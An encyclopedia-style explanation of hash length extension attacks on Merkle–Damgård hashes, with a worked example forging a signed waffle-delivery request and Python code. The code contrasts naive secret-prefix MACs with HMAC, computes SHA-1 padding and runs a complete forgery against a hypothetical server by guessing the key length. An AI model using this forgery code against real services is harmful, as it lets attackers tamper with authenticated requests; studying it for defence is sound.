In cryptography and computer security, a length extension attack is a type of attack where an attacker can use Hash(message1) and the length of message1 to calculate Hash(message1 ‖ message2) for an attacker-controlled message2, without needing to know the content of message1.
Algorithms like MD5, SHA-1 and most of SHA-2 that are based on the Merkle–Damgård construction are susceptible to this kind of attack. Truncated versions of SHA-2, including SHA-384 and SHA-512/256, are not susceptible, nor is the SHA-3 algorithm.
When a Merkle–Damgård based hash is misused as a message authentication code with the construction H(secret ‖ message), and the message and the length of the secret are known, a length extension attack allows anyone to include extra information at the end of the message and produce a valid hash without knowing the secret. Since HMAC does not use this construction, HMAC hashes are not prone to length extension attacks.
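The difference between the two constructions can be illustrated with Python's standard `hashlib` and `hmac` modules. This is a minimal sketch: the key `secret` and the helper `verify_hmac` are hypothetical placeholders chosen for illustration, and SHA-1 is used only because the example later in this article appears to use a 160-bit digest.

```python
import hashlib
import hmac

# Assumption: a placeholder key for illustration only.
secret = b"hypothetical-key"
message = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"

# Vulnerable construction: the secret is simply prefixed to the message.
naive_mac = hashlib.sha1(secret + message).hexdigest()

# HMAC hashes twice, mixing the key into both passes, so the published
# tag is not a resumable internal state of a hash over key + message.
hmac_tag = hmac.new(secret, message, hashlib.sha1).hexdigest()

def verify_hmac(key: bytes, msg: bytes, tag_hex: str) -> bool:
    """Recompute the HMAC and compare it in constant time."""
    expected = hmac.new(key, msg, hashlib.sha1).hexdigest()
    return hmac.compare_digest(expected, tag_hex)
```

Both values are 40 hexadecimal characters long and look alike to a casual observer; only the way the key enters the computation differs.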
The vulnerable hashing functions work by taking the input message, and using it to transform an internal state. After all of the input has been processed, the hash digest is generated by outputting the internal state of the function. It is possible to reconstruct the internal state from the hash digest, which can then be used to process the new data. In this way, one may extend the message and compute the hash that is a valid signature for the new message.
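As a small illustration of how the digest exposes the internal state, the sketch below splits a 160-bit digest into five 32-bit words, which is how SHA-1 lays out its state. It assumes that the signature used in the example later in this article is a SHA-1 digest; the variable names are chosen for illustration.

```python
import hashlib
import struct

# The original signature from the example in this article
# (assumed here to be a SHA-1 digest).
digest = bytes.fromhex("6d5f807e23db210bc254a28be2d6759a0f5f5d99")

# SHA-1 outputs its five 32-bit state words in big-endian order,
# so unpacking the digest recovers the final internal state.
state = struct.unpack(">5I", digest)

# Repacking the words yields the same digest: nothing is hidden.
repacked = struct.pack(">5I", *state)

# By contrast, SHA-384 emits only 48 bytes of a 64-byte internal
# state, so its digest does not reveal the full state.
sha384_output_bytes = hashlib.sha384().digest_size
```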
A server for delivering waffles of a specified type to a specific user at a location could be implemented to handle requests of the given format:
Original Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo
Original Signature: 6d5f807e23db210bc254a28be2d6759a0f5f5d99
The server would perform the request given (to deliver ten waffles of type eggo to the given location for user “1”) only if the signature is valid for the user. The signature used here is a MAC, signed with a key not known to the attacker. (This example is also vulnerable to a replay attack, in which the same request and signature are sent a second time.)
It is possible for an attacker to modify the request, in this example switching the requested waffle from “eggo” to “liege.” This can be done by taking advantage of a flexibility in the message format: if the query string contains duplicate fields, the server gives preference to the later value. This flexibility does not indicate an exploit in the message format, because the message format was never designed to be cryptographically secure in the first place, without the signature algorithm to help it.
Desired New Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo&waffle=liege
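The "latter value wins" behaviour that the modified request relies on can be sketched with Python's standard `urllib.parse` module. The function `parse_request` is a hypothetical stand-in for the server's parser; whether a real server resolves duplicate fields this way depends on its framework.

```python
from urllib.parse import parse_qsl

def parse_request(query: str) -> dict:
    """Parse a query string, keeping the last value for duplicate keys."""
    # parse_qsl returns (key, value) pairs in order; dict() lets a
    # later pair overwrite an earlier one with the same key.
    return dict(parse_qsl(query))

original = "count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
extended = original + "&waffle=liege"

original_fields = parse_request(original)
extended_fields = parse_request(extended)
```

With this parser, appending `&waffle=liege` changes the waffle type while leaving every other field as it was.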
To sign this new message, the attacker would typically need to know the key the message was signed with, and generate a new signature by generating a new MAC. However, with a length extension attack, it is possible to feed the hash (the signature given above) into the state of the hashing function and continue where the original request had left off, so long as the attacker knows the length of the original input (key plus request). In this example, the original key’s length was 14 bytes, which could be determined by trying forged requests with various assumed lengths and checking which length results in a request that the server accepts as valid.
The message as fed into the hashing function is often padded, as many algorithms can only work on input messages whose lengths are a multiple of some given size. The content of this padding is always specified by the hash function used. The attacker must include all of these padding bits in their forged message before the internal states of their message and the original will line up. Thus, the attacker constructs a slightly different message using these padding rules:
New Data: count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x02\x28&waffle=liege
This message includes all of the padding that was appended to the original message inside of the hash function before the attacker's payload (in this case, a 0x80 followed by a number of 0x00s and a message length, 0x228 = 552 = (14+55)*8, which is the length in bits of the key plus the original message, appended at the end). The attacker knows that the state behind the hashed key/message pair for the original message is identical to that of the new message up to the final “&”. The attacker also knows the hash digest at this point, which means they know the internal state of the hashing function at that point. It is then trivial to initialize a hashing algorithm at that point, input the last few characters, and generate a new digest which can sign the new message without the original key.
New Signature: 0e41270260895979317fff3898ab85668953aaa2
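The padding bytes in the forged message above can be reproduced with a short function. This sketch assumes SHA-1 padding rules (a 0x80 byte, zero bytes up to 56 modulo 64, then the input length in bits as a 64-bit big-endian integer); `sha1_padding` is a name chosen for illustration.

```python
import struct

def sha1_padding(total_len: int) -> bytes:
    """Return the padding SHA-1 appends to an input of total_len bytes."""
    # One 0x80 byte, then enough zero bytes that the padded input
    # ends exactly 8 bytes short of a 64-byte block boundary.
    zeros = (55 - total_len) % 64
    # The final 8 bytes hold the input length in bits, big-endian.
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)

key_len = 14   # key length from the example
msg_len = 55   # length of the original request data
pad = sha1_padding(key_len + msg_len)
```

For the 69-byte input in the example, this gives 59 bytes of padding: the 0x80 byte, 56 zero bytes (50 filler bytes plus the six leading zero bytes of the length field), and the final 0x02 0x28.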
When the new signature and new data are combined into a new request, the server will accept the forged request as valid, because the signature is the same as the one that would have been generated if the key were known.
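The whole procedure can be sketched end to end in Python. This is an illustrative sketch under stated assumptions, not a reference implementation: it assumes the MAC is SHA-1(key ‖ message), the key `KEY` and the functions `server_mac` and `server_accepts` are hypothetical stand-ins for the server, and the digests it produces will differ from the ones shown above because the real key is unknown. The attacker-side code never reads `KEY`; it finds the key length by trial, as described earlier.

```python
import hashlib
import struct

def _rol(x, n):
    """Rotate a 32-bit word left by n bits."""
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def sha1_compress(state, block):
    """Apply the SHA-1 compression function to one 64-byte block."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rol(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        t = (_rol(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF
        a, b, c, d, e = t, a, _rol(b, 30), c, d
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))

def sha1_padding(total_len):
    """Padding SHA-1 appends to an input of total_len bytes."""
    return (b"\x80" + b"\x00" * ((55 - total_len) % 64)
            + struct.pack(">Q", total_len * 8))

def extend(orig_digest_hex, orig_len, suffix):
    """Resume hashing from a known digest.

    orig_len is the assumed byte length of key + original message.
    Returns the glue padding and the digest of the extended input.
    """
    state = struct.unpack(">5I", bytes.fromhex(orig_digest_hex))
    glue = sha1_padding(orig_len)
    processed = orig_len + len(glue)  # bytes the original hash absorbed
    tail = suffix + sha1_padding(processed + len(suffix))
    for i in range(0, len(tail), 64):
        state = sha1_compress(state, tail[i:i + 64])
    return glue, struct.pack(">5I", *state).hex()

# --- Hypothetical server side (assumption: 14-byte placeholder key) ---
KEY = b"hypothetical14"

def server_mac(message):
    return hashlib.sha1(KEY + message).hexdigest()

def server_accepts(message, signature):
    return server_mac(message) == signature

# --- Attacker side: knows only the message, its signature, and the oracle ---
original = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
signature = server_mac(original)  # observed on the wire
suffix = b"&waffle=liege"

found = None
for key_len in range(1, 33):  # try assumed key lengths
    glue, forged_sig = extend(signature, key_len + len(original), suffix)
    forged_msg = original + glue + suffix
    if server_accepts(forged_msg, forged_sig):
        found = (key_len, forged_msg, forged_sig)
        break
```

The compression function is written out by hand because `hashlib` does not expose a way to start from a chosen internal state; dedicated tools for this attack work on the same principle.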